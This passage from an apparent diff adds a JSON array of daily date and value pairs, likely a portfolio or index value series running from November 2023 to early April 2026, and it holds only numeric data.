"2023-11-09", + 9660.672628747072 + ], + [ + "2023-11-10", + 9669.713973205096 + ], + [ + "2023-11-13", + 9667.85826656587 + ], + [ + "2023-11-14", + 9689.71977531033 + ], + [ + "2023-11-15", + 9691.773434428393 + ], + [ + "2023-11-16", + 9692.910315445894 + ], + [ + "2023-11-17", + 9694.04732982376 + ], + [ + "2023-11-20", + 9695.184477577635 + ], + [ + "2023-11-21", + 9696.321758723165 + ], + [ + "2023-11-22", + 9697.459173275996 + ], + [ + "2023-11-24", + 9698.596721251779 + ], + [ + "2023-11-27", + 9699.734402666165 + ], + [ + "2023-11-28", + 9700.872217534805 + ], + [ + "2023-11-29", + 9702.010165873355 + ], + [ + "2023-11-30", + 9703.14824769747 + ], + [ + "2023-12-01", + 9704.286463022812 + ], + [ + "2023-12-04", + 9705.424811865038 + ], + [ + "2023-12-05", + 9706.56329423981 + ], + [ + "2023-12-06", + 9707.701910162794 + ], + [ + "2023-12-07", + 9708.840659649653 + ], + [ + "2023-12-08", + 9709.979542716057 + ], + [ + "2023-12-11", + 9711.118559377674 + ], + [ + "2023-12-12", + 9712.257709650175 + ], + [ + "2023-12-13", + 9713.396993549235 + ], + [ + "2023-12-14", + 9714.536411090527 + ], + [ + "2023-12-15", + 9715.675962289728 + ], + [ + "2023-12-18", + 9716.815647162517 + ], + [ + "2023-12-19", + 9717.955465724574 + ], + [ + "2023-12-20", + 9719.09541799158 + ], + [ + "2023-12-21", + 9720.235503979222 + ], + [ + "2023-12-22", + 9721.375723703184 + ], + [ + "2023-12-26", + 9722.516077179154 + ], + [ + "2023-12-27", + 9723.656564422823 + ], + [ + "2023-12-28", + 9724.797185449881 + ], + [ + "2023-12-29", + 9725.93794027602 + ], + [ + "2024-01-02", + 9724.088828916938 + ], + [ + "2024-01-03", + 9711.35806689622 + ], + [ + "2024-01-04", + 9702.80711810147 + ], + [ + "2024-01-05", + 9712.797044565961 + ], + [ + "2024-01-08", + 9738.301870299598 + ], + [ + "2024-01-09", + 9736.454209275425 + ], + [ + "2024-01-10", + 9746.547597299508 + ], + [ + "2024-01-11", + 9750.752601206588 + ], + [ + "2024-01-12", + 9750.9412640478 + ], + [ + "2024-01-16", + 9749.095085671455 + ], + [ + "2024-01-17", + 9744.99382823554 + ], + [ + "2024-01-18", + 9760.860100456353 + ], + [ + "2024-01-19", + 9762.829281557873 + ], + [ + "2024-01-22", + 9763.974497690131 + ], + [ + "2024-01-23", + 9765.119848160495 + ], + [ + "2024-01-24", + 9766.265332984723 + ], + [ + "2024-01-25", + 9767.410952178576 + ], + [ + "2024-01-26", + 9768.556705757814 + ], + [ + "2024-01-29", + 9769.702593738202 + ], + [ + "2024-01-30", + 9770.848616135505 + ], + [ + "2024-01-31", + 9769.004772965493 + ], + [ + "2024-02-01", + 9784.744220494498 + ], + [ + "2024-02-02", + 9787.735403026654 + ], + [ + "2024-02-05", + 9788.883540739458 + ], + [ + "2024-02-06", + 9790.03181313308 + ], + [ + "2024-02-07", + 9791.180220223318 + ], + [ + "2024-02-08", + 9792.328762025973 + ], + [ + "2024-02-09", + 9793.477438556845 + ], + [ + "2024-02-12", + 9794.626249831741 + ], + [ + "2024-02-13", + 9792.785195866467 + ], + [ + "2024-02-14", + 9810.119452019055 + ], + [ + "2024-02-15", + 9813.261865877503 + ], + [ + "2024-02-16", + 9814.4129979392 + ], + [ + "2024-02-20", + 9812.574265032963 + ], + [ + "2024-02-21", + 9810.792005312416 + ], + [ + "2024-02-22", + 9830.002542773469 + ], + [ + "2024-02-23", + 9831.155638578739 + ], + [ + "2024-02-26", + 9832.30886964643 + ], + [ + "2024-02-27", + 9830.472235992407 + ], + [ + "2024-02-28", + 9826.12754799375 + ], + [ + "2024-02-29", + 9851.99718688755 + ], + [ + "2024-03-01", + 9862.01001031986 + ], + [ + "2024-03-04", + 9863.166860719943 + ], + [ + "2024-03-05", + 9861.333846822874 + ], + [ + "2024-03-06", + 9875.976430151679 + ], + [ + "2024-03-07", + 9886.85917172196 + ], + [ + "2024-03-08", + 9888.018937020961 + ], + [ + "2024-03-11", + 9889.178838364738 + ], + [ + "2024-03-12", + 9887.348875769252 + ], + [ + "2024-03-13", + 9879.585595314273 + ], + [ + "2024-03-14", + 9881.746658060783 + ], + [ + "2024-03-15", + 9844.219456813265 + ], + [ + "2024-03-18", + 9915.132860173093 + ], + [ + "2024-03-19", + 9925.791052633023 + ], + [ + "2024-03-20", + 9947.524161357454 + ], + [ + "2024-03-21", + 9956.115332014735 + ], + [ + "2024-03-22", + 9957.283221318545 + ], + [ + "2024-03-25", + 9958.451247620107 + ], + [ + "2024-03-26", + 9956.629410935493 + ], + [ + "2024-03-27", + 9966.75370938776 + ], + [ + "2024-03-28", + 9969.74265764833 + ], + [ + "2024-04-01", + 9981.36563415586 + ], + [ + "2024-04-02", + 9979.546485413886 + ], + [ + "2024-04-03", + 9991.387804548844 + ], + [ + "2024-04-04", + 9963.288822328144 + ], + [ + "2024-04-05", + 9993.779108736426 + ], + [ + "2024-04-08", + 10000.964041697238 + ], + [ + "2024-04-09", + 9999.147191921254 + ], + [ + "2024-04-10", + 9991.721201682727 + ], + [ + "2024-04-11", + 10010.929534916226 + ], + [ + "2024-04-12", + 9992.666831704211 + ], + [ + "2024-04-15", + 9952.995835395397 + ], + [ + "2024-04-16", + 9961.235388069128 + ], + [ + "2024-04-17", + 9893.414367971243 + ], + [ + "2024-04-18", + 9853.448967374583 + ], + [ + "2024-04-19", + 9726.726321368762 + ], + [ + "2024-04-22", + 9778.942054487405 + ], + [ + "2024-04-23", + 9814.284531186806 + ], + [ + "2024-04-24", + 9822.96792898442 + ], + [ + "2024-04-25", + 9825.609620433364 + ], + [ + "2024-04-26", + 9825.998940780619 + ], + [ + "2024-04-29", + 9847.36268604449 + ], + [ + "2024-04-30", + 9816.091540197469 + ], + [ + "2024-05-01", + 9802.415881808058 + ], + [ + "2024-05-02", + 9852.413518707654 + ], + [ + "2024-05-03", + 9857.448499358245 + ], + [ + "2024-05-06", + 9888.947434863407 + ], + [ + "2024-05-07", + 9891.391984564001 + ], + [ + "2024-05-08", + 9892.552281578783 + ], + [ + "2024-05-09", + 9893.712714700714 + ], + [ + "2024-05-10", + 9891.88328394576 + ], + [ + "2024-05-13", + 9915.93819930409 + ], + [ + "2024-05-14", + 9922.725602500059 + ], + [ + "2024-05-15", + 9923.889575064592 + ], + [ + "2024-05-16", + 9925.05368416743 + ], + [ + "2024-05-17", + 9926.217929824588 + ], + [ + "2024-05-20", + 9927.382312052086 + ], + [ + "2024-05-21", + 9928.546830865944 + ], + [ + "2024-05-22", + 9929.711486282184 + ], + [ + "2024-05-23", + 9930.87627831683 + ], + [ + "2024-05-24", + 9932.041206985907 + ], + [ + "2024-05-28", + 9933.206272305442 + ], + [ + "2024-05-29", + 9934.371474291467 + ], + [ + "2024-05-30", + 9932.546812960012 + ], + [ + "2024-05-31", + 9937.041035168158 + ], + [ + "2024-06-03", + 9943.415475570577 + ], + [ + "2024-06-04", + 9944.58187513406 + ], + [ + "2024-06-05", + 9945.748411520543 + ], + [ + "2024-06-06", + 9946.915084746077 + ], + [ + "2024-06-07", + 9948.081894826713 + ], + [ + "2024-06-10", + 9949.248841778506 + ], + [ + "2024-06-11", + 9950.41592561751 + ], + [ + "2024-06-12", + 9951.583146359782 + ], + [ + "2024-06-13", + 9952.750504021382 + ], + [ + "2024-06-14", + 9953.917998618372 + ], + [ + "2024-06-17", + 9955.085630166814 + ], + [ + "2024-06-18", + 9956.253398682773 + ], + [ + "2024-06-20", + 9957.421304182315 + ], + [ + "2024-06-21", + 9958.58934668151 + ], + [ + "2024-06-24", + 9956.767526196429 + ], + [ + "2024-06-25", + 9970.560519746816 + ], + [ + "2024-06-26", + 9970.88224539734 + ], + [ + "2024-06-27", + 9972.051866914931 + ], + [ + "2024-06-28", + 9973.22162563347 + ], + [ + "2024-07-01", + 9974.391521569052 + ], + [ + "2024-07-02", + 9975.561554737771 + ], + [ + "2024-07-03", + 9976.731725155725 + ], + [ + "2024-07-05", + 9977.902032839016 + ], + [ + "2024-07-08", + 9979.072477803744 + ], + [ + "2024-07-09", + 9980.243060066014 + ], + [ + "2024-07-10", + 9981.413779641929 + ], + [ + "2024-07-11", + 9979.5946365476 + ], + [ + "2024-07-12", + 9994.927113159929 + ], + [ + "2024-07-15", + 10002.221169809165 + ], + [ + "2024-07-16", + 10003.394467498978 + ], + [ + "2024-07-17", + 10004.567902820967 + ], + [ + "2024-07-18", + 10002.751475791276 + ], + [ + "2024-07-19", + 9985.425584034481 + ], + [ + "2024-07-22", + 10033.425750234312 + ], + [ + "2024-07-23", + 10034.429731532402 + ], + [ + "2024-07-24", + 10035.606807406122 + ], + [ + "2024-07-25", + 10033.794021355214 + ], + [ + "2024-07-26", + 10058.637814948823 + ], + [ + "2024-07-29", + 10076.750982327994 + ], + [ + "2024-07-30", + 10077.933022641606 + ], + [ + "2024-07-31", + 10079.115201612936 + ], + [ + "2024-08-01", + 10077.307519258251 + ], + [ + "2024-08-02", + 9996.124722321787 + ], + [ + "2024-08-05", + 9846.663707405796 + ], + [ + "2024-08-06", + 9913.275882820584 + ], + [ + "2024-08-07", + 9839.102324424108 + ], + [ + "2024-08-08", + 10077.025265960247 + ], + [ + "2024-08-09", + 10109.904768197168 + ], + [ + "2024-08-12", + 10164.564446329807 + ], + [ + "2024-08-13", + 10246.77218377181 + ], + [ + "2024-08-14", + 10265.64137184628 + ], + [ + "2024-08-15", + 10270.142081366994 + ], + [ + "2024-08-16", + 10287.653188747026 + ], + [ + "2024-08-19", + 10356.660580187123 + ], + [ + "2024-08-20", + 10364.446034707358 + ], + [ + "2024-08-21", + 10365.661822719067 + ], + [ + "2024-08-22", + 10363.887753347224 + ], + [ + "2024-08-23", + 10402.149062223043 + ], + [ + "2024-08-26", + 10416.56365490347 + ], + [ + "2024-08-27", + 10438.97972745261 + ], + [ + "2024-08-28", + 10440.36601372321 + ], + [ + "2024-08-29", + 10454.293905526083 + ], + [ + "2024-08-30", + 10495.468382774214 + ], + [ + "2024-09-03", + 10454.026750044251 + ], + [ + "2024-09-04", + 10462.393494843749 + ], + [ + "2024-09-05", + 10508.727621024182 + ], + [ + "2024-09-06", + 10345.102191199057 + ], + [ + "2024-09-09", + 10446.89037460867 + ], + [ + "2024-09-10", + 10495.518996961713 + ], + [ + "2024-09-11", + 10570.541634839057 + ], + [ + "2024-09-12", + 10593.432295768604 + ], + [ + "2024-09-13", + 10605.51958418665 + ], + [ + "2024-09-16", + 10608.191044568694 + ], + [ + "2024-09-17", + 10620.142724626232 + ], + [ + "2024-09-18", + 10618.81665331413 + ], + [ + "2024-09-19", + 10653.95445227437 + ], + [ + "2024-09-20", + 10655.204200698645 + ], + [ + "2024-09-23", + 10653.46409572305 + ], + [ + "2024-09-24", + 10675.074216709538 + ], + [ + "2024-09-25", + 10686.148727094149 + ], + [ + "2024-09-26", + 10701.268340680537 + ], + [ + "2024-09-27", + 10702.523639199639 + ], + [ + "2024-09-30", + 10700.789084969918 + ], + [ + "2024-10-01", + 10678.333766704081 + ], + [ + "2024-10-02", + 10693.841996835034 + ], + [ + "2024-10-03", + 10701.867711191358 + ], + [ + "2024-10-04", + 10748.991397634125 + ], + [ + "2024-10-07", + 10747.262294245042 + ], + [ + "2024-10-08", + 10767.9373647638 + ], + [ + "2024-10-09", + 10771.892062796072 + ], + [ + "2024-10-10", + 10773.155645740062 + ], + [ + "2024-10-11", + 10774.419376907024 + ], + [ + "2024-10-14", + 10775.683256314345 + ], + [ + "2024-10-15", + 10773.957283979413 + ], + [ + "2024-10-16", + 10780.383287190112 + ], + [ + "2024-10-17", + 10795.734468354143 + ], + [ + "2024-10-18", + 10799.468946554802 + ], + [ + "2024-10-21", + 10800.735764369672 + ], + [ + "2024-10-22", + 10802.002730786977 + ], + [ + "2024-10-23", + 10800.279845824147 + ], + [ + "2024-10-24", + 10813.834126455202 + ], + [ + "2024-10-25", + 10816.889801372039 + ], + [ + "2024-10-28", + 10818.158662717879 + ], + [ + "2024-10-29", + 10819.427672905866 + ], + [ + "2024-10-30", + 10820.69683195346 + ], + [ + "2024-10-31", + 10818.976139878127 + ], + [ + "2024-11-01", + 10837.056719725953 + ], + [ + "2024-11-04", + 10844.171465607886 + ], + [ + "2024-11-05", + 10845.443527194258 + ], + [ + "2024-11-06", + 10846.71573799818 + ], + [ + "2024-11-07", + 10847.988098037154 + ], + [ + "2024-11-08", + 10849.260607328686 + ], + [ + "2024-11-11", + 10850.533265890284 + ], + [ + "2024-11-12", + 10851.806073739457 + ], + [ + "2024-11-13", + 10853.079030893718 + ], + [ + "2024-11-14", + 10851.362137370581 + ], + [ + "2024-11-15", + 10742.346261501696 + ], + [ + "2024-11-18", + 10817.054778551717 + ], + [ + "2024-11-19", + 10861.643246063515 + ], + [ + "2024-11-20", + 10882.247335605001 + ], + [ + "2024-11-21", + 10894.79429318293 + ], + [ + "2024-11-22", + 10907.109276431713 + ], + [ + "2024-11-25", + 10933.97999812833 + ], + [ + "2024-11-26", + 10942.333210322988 + ], + [ + "2024-11-27", + 10943.616786646573 + ], + [ + "2024-11-29", + 10941.910513538427 + ], + [ + "2024-12-02", + 10969.753110195777 + ], + [ + "2024-12-03", + 10971.03990297545 + ], + [ + "2024-12-04", + 10972.326846700695 + ], + [ + "2024-12-05", + 10973.613941389218 + ], + [ + "2024-12-06", + 10974.90118705873 + ], + [ + "2024-12-09", + 10976.188583726936 + ], + [ + "2024-12-10", + 10977.476131411555 + ], + [ + "2024-12-11", + 10978.763830130298 + ], + [ + "2024-12-12", + 10977.061679900882 + ], + [ + "2024-12-13", + 10996.446605577596 + ], + [ + "2024-12-16", + 11007.366194240261 + ], + [ + "2024-12-17", + 11008.65739917438 + ], + [ + "2024-12-18", + 11009.948755571635 + ], + [ + "2024-12-19", + 11008.25026344979 + ], + [ + "2024-12-20", + 11033.867615561605 + ], + [ + "2024-12-23", + 11053.421615601823 + ], + [ + "2024-12-24", + 11054.71822300791 + ], + [ + "2024-12-26", + 11053.024982510862 + ], + [ + "2024-12-27", + 11006.727900289416 + ], + [ + "2024-12-30", + 10963.80408444442 + ], + [ + "2024-12-31", + 10905.619055099021 + ], + [ + "2025-01-02", + 10898.552385979363 + ], + [ + "2025-01-03", + 10994.546412295591 + ], + [ + "2025-01-06", + 11067.634250178178 + ], + [ + "2025-01-07", + 11016.739539927921 + ], + [ + "2025-01-08", + 11044.881496762724 + ], + [ + "2025-01-10", + 10923.031775328334 + ], + [ + "2025-01-13", + 10944.775788797428 + ], + [ + "2025-01-14", + 10950.980581303196 + ], + [ + "2025-01-15", + 11087.464572945122 + ], + [ + "2025-01-16", + 11087.723147841092 + ], + [ + "2025-01-17", + 11127.752766116408 + ], + [ + "2025-01-21", + 11191.854460541446 + ], + [ + "2025-01-22", + 11193.167306634363 + ], + [ + "2025-01-23", + 11194.480306729001 + ], + [ + "2025-01-24", + 11192.803460843428 + ], + [ + "2025-01-27", + 11060.104645835914 + ], + [ + "2025-01-28", + 11164.705287097568 + ], + [ + "2025-01-29", + 11177.214465777553 + ], + [ + "2025-01-30", + 11223.049691853079 + ], + [ + "2025-01-31", + 11246.914620219759 + ], + [ + "2025-02-03", + 11252.000777204508 + ], + [ + "2025-02-04", + 11294.720051175407 + ], + [ + "2025-02-05", + 11304.67900685549 + ], + [ + "2025-02-06", + 11306.005087686699 + ], + [ + "2025-02-07", + 11304.341324072117 + ], + [ + "2025-02-10", + 11348.199610308271 + ], + [ + "2025-02-11", + 11349.530796267894 + ], + [ + "2025-02-12", + 11350.862138380575 + ], + [ + "2025-02-13", + 11352.19363666463 + ], + [ + "2025-02-14", + 11350.535291138378 + ], + [ + "2025-02-18", + 11388.796976046227 + ], + [ + "2025-02-19", + 11392.886782757598 + ], + [ + "2025-02-20", + 11394.223210688511 + ], + [ + "2025-02-21", + 11392.569795387384 + ], + [ + "2025-02-24", + 11379.296118462467 + ], + [ + "2025-02-25", + 11337.40028861886 + ], + [ + "2025-02-26", + 11370.195947194812 + ], + [ + "2025-02-27", + 11094.222099148348 + ], + [ + "2025-02-28", + 11254.678164435656 + ], + [ + "2025-03-03", + 11093.306216765128 + ], + [ + "2025-03-04", + 11081.611478784245 + ], + [ + "2025-03-05", + 11164.14533256429 + ], + [ + "2025-03-06", + 10974.588590909543 + ], + [ + "2025-03-07", + 11039.770052958176 + ], + [ + "2025-03-10", + 10682.70175341415 + ], + [ + "2025-03-11", + 10678.121971574808 + ], + [ + "2025-03-12", + 10739.717442877625 + ], + [ + "2025-03-13", + 10653.70087703654 + ], + [ + "2025-03-14", + 10779.213092798504 + ], + [ + "2025-03-17", + 10855.468232863372 + ], + [ + "2025-03-18", + 10809.863448903205 + ], + [ + "2025-03-19", + 10861.957015830478 + ], + [ + "2025-03-20", + 10865.63242609046 + ], + [ + "2025-03-21", + 10890.873007472765 + ], + [ + "2025-03-24", + 10930.177758456193 + ], + [ + "2025-03-25", + 10958.141848338715 + ], + [ + "2025-03-26", + 10911.031907621784 + ], + [ + "2025-03-27", + 10910.772653163138 + ], + [ + "2025-03-28", + 10768.42321970827 + ], + [ + "2025-03-31", + 10789.356148905035 + ], + [ + "2025-04-01", + 10832.724088948522 + ], + [ + "2025-04-02", + 10875.072790515858 + ], + [ + "2025-04-03", + 10545.821686500603 + ], + [ + "2025-04-04", + 10194.966576485933 + ], + [ + "2025-04-07", + 10240.160778560452 + ], + [ + "2025-04-08", + 10180.110450587306 + ], + [ + "2025-04-09", + 10355.379959796377 + ], + [ + "2025-04-10", + 10342.688234321326 + ], + [ + "2025-04-11", + 10362.723302130466 + ], + [ + "2025-04-14", + 10440.005819275755 + ], + [ + "2025-04-15", + 10468.289446841363 + ], + [ + "2025-04-16", + 10412.999118545727 + ], + [ + "2025-04-17", + 10449.566210826159 + ], + [ + "2025-04-21", + 10365.84763021266 + ], + [ + "2025-04-22", + 10449.947998569614 + ], + [ + "2025-04-23", + 10514.547823939109 + ], + [ + "2025-04-24", + 10573.685859484833 + ], + [ + "2025-04-25", + 10600.177304134448 + ], + [ + "2025-04-28", + 10621.82027085973 + ], + [ + "2025-04-29", + 10661.648313077489 + ], + [ + "2025-04-30", + 10685.618586202547 + ], + [ + "2025-05-01", + 10737.830294966674 + ], + [ + "2025-05-02", + 10799.054423473464 + ], + [ + "2025-05-05", + 10840.0150104259 + ], + [ + "2025-05-06", + 10828.24936164158 + ], + [ + "2025-05-07", + 10867.162690972204 + ], + [ + "2025-05-08", + 10994.652834780183 + ], + [ + "2025-05-09", + 11014.970691460918 + ], + [ + "2025-05-12", + 11016.262788430804 + ], + [ + "2025-05-13", + 11017.555036968462 + ], + [ + "2025-05-14", + 11018.847437091674 + ], + [ + "2025-05-15", + 11020.13998881822 + ], + [ + "2025-05-16", + 11021.432692165885 + ], + [ + "2025-05-19", + 11022.725547152453 + ], + [ + "2025-05-20", + 11024.018553795711 + ], + [ + "2025-05-21", + 11022.321712113451 + ], + [ + "2025-05-22", + 11042.115846145178 + ], + [ + "2025-05-23", + 11025.161508232155 + ], + [ + "2025-05-27", + 11070.676845973721 + ], + [ + "2025-05-28", + 11068.985477482416 + ], + [ + "2025-05-29", + 11081.649013372451 + ], + [ + "2025-05-30", + 11087.04752066891 + ], + [ + "2025-06-02", + 11116.591426976856 + ], + [ + "2025-06-03", + 11117.89544443642 + ], + [ + "2025-06-04", + 11119.199614862076 + ], + [ + "2025-06-05", + 11120.503938271766 + ], + [ + "2025-06-06", + 11121.808414683435 + ], + [ + "2025-06-09", + 11123.113044115033 + ], + [ + "2025-06-10", + 11124.417826584508 + ], + [ + "2025-06-11", + 11125.722762109812 + ], + [ + "2025-06-12", + 11127.0278507089 + ], + [ + "2025-06-13", + 11128.333092399727 + ], + [ + "2025-06-16", + 11129.638487200253 + ], + [ + "2025-06-17", + 11130.944035128436 + ], + [ + "2025-06-18", + 11132.24973620224 + ], + [ + "2025-06-20", + 11133.55559043963 + ], + [ + "2025-06-23", + 11134.861597858571 + ], + [ + "2025-06-24", + 11136.167758477033 + ], + [ + "2025-06-25", + 11137.474072312985 + ], + [ + "2025-06-26", + 11138.780539384403 + ], + [ + "2025-06-27", + 11140.08715970926 + ], + [ + "2025-06-30", + 11141.393933305533 + ], + [ + "2025-07-01", + 11142.700860191202 + ], + [ + "2025-07-02", + 11144.007940384248 + ], + [ + "2025-07-03", + 11145.315173902656 + ], + [ + "2025-07-07", + 11146.62256076441 + ], + [ + "2025-07-08", + 11147.930100987498 + ], + [ + "2025-07-09", + 11149.237794589912 + ], + [ + "2025-07-10", + 11150.54564158964 + ], + [ + "2025-07-11", + 11151.85364200468 + ], + [ + "2025-07-14", + 11153.161795853026 + ], + [ + "2025-07-15", + 11154.470103152677 + ], + [ + "2025-07-16", + 11155.77856392163 + ], + [ + "2025-07-17", + 11157.087178177893 + ], + [ + "2025-07-18", + 11158.395945939468 + ], + [ + "2025-07-21", + 11159.704867224362 + ], + [ + "2025-07-22", + 11161.013942050584 + ], + [ + "2025-07-23", + 11162.323170436144 + ], + [ + "2025-07-24", + 11163.632552399056 + ], + [ + "2025-07-25", + 11164.942087957335 + ], + [ + "2025-07-28", + 11166.251777128999 + ], + [ + "2025-07-29", + 11167.561619932067 + ], + [ + "2025-07-30", + 11168.87161638456 + ], + [ + "2025-07-31", + 11170.181766504502 + ], + [ + "2025-08-01", + 11171.492070309918 + ], + [ + "2025-08-04", + 11172.802527818838 + ], + [ + "2025-08-05", + 11174.11313904929 + ], + [ + "2025-08-06", + 11175.423904019306 + ], + [ + "2025-08-07", + 11176.734822746921 + ], + [ + "2025-08-08", + 11178.045895250172 + ], + [ + "2025-08-11", + 11179.357121547097 + ], + [ + "2025-08-12", + 11180.668501655735 + ], + [ + "2025-08-13", + 11181.980035594132 + ], + [ + "2025-08-14", + 11183.29172338033 + ], + [ + "2025-08-15", + 11184.603565032376 + ], + [ + "2025-08-18", + 11185.915560568319 + ], + [ + "2025-08-19", + 11187.227710006213 + ], + [ + "2025-08-20", + 11188.540013364109 + ], + [ + "2025-08-21", + 11189.852470660062 + ], + [ + "2025-08-22", + 11191.16508191213 + ], + [ + "2025-08-25", + 11192.477847138372 + ], + [ + "2025-08-26", + 11193.790766356851 + ], + [ + "2025-08-27", + 11195.10383958563 + ], + [ + "2025-08-28", + 11196.417066842776 + ], + [ + "2025-08-29", + 11197.730448146356 + ], + [ + "2025-09-02", + 11199.04398351444 + ], + [ + "2025-09-03", + 11200.357672965103 + ], + [ + "2025-09-04", + 11201.671516516417 + ], + [ + "2025-09-05", + 11202.985514186457 + ], + [ + "2025-09-08", + 11204.299665993305 + ], + [ + "2025-09-09", + 11205.613971955041 + ], + [ + "2025-09-10", + 11206.928432089746 + ], + [ + "2025-09-11", + 11208.243046415508 + ], + [ + "2025-09-12", + 11209.55781495041 + ], + [ + "2025-09-15", + 11210.872737712547 + ], + [ + "2025-09-16", + 11212.187814720006 + ], + [ + "2025-09-17", + 11213.503045990881 + ], + [ + "2025-09-18", + 11214.81843154327 + ], + [ + "2025-09-19", + 11216.13397139527 + ], + [ + "2025-09-22", + 11217.449665564978 + ], + [ + "2025-09-23", + 11218.7655140705 + ], + [ + "2025-09-24", + 11220.081516929937 + ], + [ + "2025-09-25", + 11221.397674161397 + ], + [ + "2025-09-26", + 11222.71398578299 + ], + [ + "2025-09-29", + 11224.030451812823 + ], + [ + "2025-09-30", + 11225.347072269013 + ], + [ + "2025-10-01", + 11226.66384716967 + ], + [ + "2025-10-02", + 11227.980776532913 + ], + [ + "2025-10-03", + 11229.297860376862 + ], + [ + "2025-10-06", + 11230.615098719638 + ], + [ + "2025-10-07", + 11231.932491579362 + ], + [ + "2025-10-08", + 11233.250038974162 + ], + [ + "2025-10-09", + 11234.567740922164 + ], + [ + "2025-10-10", + 11235.8855974415 + ], + [ + "2025-10-13", + 11237.203608550299 + ], + [ + "2025-10-14", + 11238.521774266696 + ], + [ + "2025-10-15", + 11236.850094608826 + ], + [ + "2025-10-16", + 11235.897991894557 + ], + [ + "2025-10-17", + 11265.245792374204 + ], + [ + "2025-10-20", + 11291.66333458456 + ], + [ + "2025-10-21", + 11292.987888629075 + ], + [ + "2025-10-22", + 11291.322598048697 + ], + [ + "2025-10-23", + 11322.839852170953 + ], + [ + "2025-10-24", + 11340.191933150514 + ], + [ + "2025-10-27", + 11341.522179779868 + ], + [ + "2025-10-28", + 11342.852582452091 + ], + [ + "2025-10-29", + 11344.18314118549 + ], + [ + "2025-10-30", + 11342.523855998366 + ], + [ + "2025-10-31", + 11373.722957534035 + ], + [ + "2025-11-03", + 11413.506880420531 + ], + [ + "2025-11-04", + 11414.845727165479 + ], + [ + "2025-11-05", + 11416.184730962123 + ], + [ + "2025-11-06", + 11414.533891828885 + ], + [ + "2025-11-07", + 11446.354434817415 + ], + [ + "2025-11-10", + 11506.065610758413 + ], + [ + "2025-11-11", + 11507.415314986178 + ], + [ + "2025-11-12", + 11508.76517753926 + ], + [ + "2025-11-13", + 11507.125198436235 + ], + [ + "2025-11-14", + 11520.944200822674 + ], + [ + "2025-11-17", + 11531.70021786125 + ], + [ + "2025-11-18", + 11484.431550574956 + ], + [ + "2025-11-19", + 11548.011303622648 + ], + [ + "2025-11-20", + 11308.357944459758 + ], + [ + "2025-11-21", + 11377.679902645952 + ], + [ + "2025-11-24", + 11522.404115869705 + ], + [ + "2025-11-25", + 11540.63687250363 + ], + [ + "2025-11-26", + 11546.749322050611 + ], + [ + "2025-11-28", + 11545.015209550691 + ], + [ + "2025-12-01", + 11576.906916598567 + ], + [ + "2025-12-02", + 11613.828449047971 + ], + [ + "2025-12-03", + 11628.779905030276 + ], + [ + "2025-12-04", + 11630.1440041005 + ], + [ + "2025-12-05", + 11628.518263184611 + ], + [ + "2025-12-08", + 11657.971101940624 + ], + [ + "2025-12-09", + 11682.152303116296 + ], + [ + "2025-12-10", + 11694.589863613852 + ], + [ + "2025-12-11", + 11695.961682436624 + ], + [ + "2025-12-12", + 11697.333662178838 + ], + [ + "2025-12-15", + 11698.705802859373 + ], + [ + "2025-12-16", + 11700.078104497105 + ], + [ + "2025-12-17", + 11698.460567110913 + ], + [ + "2025-12-18", + 11735.13206564904 + ], + [ + "2025-12-19", + 11749.951068561832 + ], + [ + "2025-12-22", + 11751.329381459547 + ], + [ + "2025-12-23", + 11752.707856038483 + ], + [ + "2025-12-24", + 11754.086492317609 + ], + [ + "2025-12-26", + 11755.46529031589 + ], + [ + "2025-12-29", + 11756.844250052296 + ], + [ + "2025-12-30", + 11758.2233715458 + ], + [ + "2025-12-31", + 11759.602654815379 + ], + [ + "2026-01-02", + 11760.982099880006 + ], + [ + "2026-01-05", + 11762.361706758662 + ], + [ + "2026-01-06", + 11763.74147547033 + ], + [ + "2026-01-07", + 11765.12140603399 + ], + [ + "2026-01-08", + 11766.501498468631 + ], + [ + "2026-01-09", + 11767.88175279324 + ], + [ + "2026-01-12", + 11769.262169026808 + ], + [ + "2026-01-13", + 11770.642747188325 + ], + [ + "2026-01-14", + 11772.023487296789 + ], + [ + "2026-01-15", + 11773.404389371195 + ], + [ + "2026-01-16", + 11774.785453430542 + ], + [ + "2026-01-20", + 11776.166679493834 + ], + [ + "2026-01-21", + 11777.548067580072 + ], + [ + "2026-01-22", + 11778.929617708263 + ], + [ + "2026-01-23", + 11780.311329897415 + ], + [ + "2026-01-26", + 11781.693204166539 + ], + [ + "2026-01-27", + 11783.075240534645 + ], + [ + "2026-01-28", + 11784.45743902075 + ], + [ + "2026-01-29", + 11785.839799643873 + ], + [ + "2026-01-30", + 11787.22232242303 + ], + [ + "2026-02-02", + 11788.605007377242 + ], + [ + "2026-02-03", + 11789.987854525534 + ], + [ + "2026-02-04", + 11791.370863886934 + ], + [ + "2026-02-05", + 11792.754035480468 + ], + [ + "2026-02-06", + 11791.147369325166 + ], + [ + "2026-02-09", + 11835.236425557157 + ], + [ + "2026-02-10", + 11837.13811614761 + ], + [ + "2026-02-11", + 11844.721641422944 + ], + [ + "2026-02-12", + 11846.111071260819 + ], + [ + "2026-02-13", + 11844.510664083971 + ], + [ + "2026-02-17", + 11883.875601917995 + ], + [ + "2026-02-18", + 11901.370667600433 + ], + [ + "2026-02-19", + 11902.766742579463 + ], + [ + "2026-02-20", + 11904.162981323272 + ], + [ + "2026-02-23", + 11905.559383851072 + ], + [ + "2026-02-24", + 11903.965950182075 + ], + [ + "2026-02-25", + 11941.19904851683 + ], + [ + "2026-02-26", + 11925.46834943457 + ], + [ + "2026-02-27", + 11927.761934973434 + ], + [ + "2026-03-02", + 11958.848512371751 + ], + [ + "2026-03-03", + 11957.261329715437 + ], + [ + "2026-03-04", + 11996.709840013624 + ], + [ + "2026-03-05", + 12002.977238187175 + ], + [ + "2026-03-06", + 11982.30857911645 + ], + [ + "2026-03-09", + 12014.794839085307 + ], + [ + "2026-03-10", + 12016.204219140891 + ], + [ + "2026-03-11", + 12017.61376452199 + ], + [ + "2026-03-12", + 12019.023475247996 + ], + [ + "2026-03-13", + 12020.433351338306 + ], + [ + "2026-03-16", + 12021.843392812318 + ], + [ + "2026-03-17", + 12023.253599689431 + ], + [ + "2026-03-18", + 12024.663971989048 + ], + [ + "2026-03-19", + 12026.074509730573 + ], + [ + "2026-03-20", + 12024.495212933412 + ], + [ + "2026-03-23", + 12060.749667293909 + ], + [ + "2026-03-24", + 12062.16443802151 + ], + [ + "2026-03-25", + 12063.579374706971 + ], + [ + "2026-03-26", + 12064.99447736976 + ], + [ + "2026-03-27", + 12063.419746029349 + ], + [ + "2026-03-30", + 12069.41756181021 + ], + [ + "2026-03-31", + 12108.986628625727 + ], + [ + "2026-04-01", + 12110.407057728036 + ], + [ + "2026-04-02", + 12111.827653451955 + ], + [ 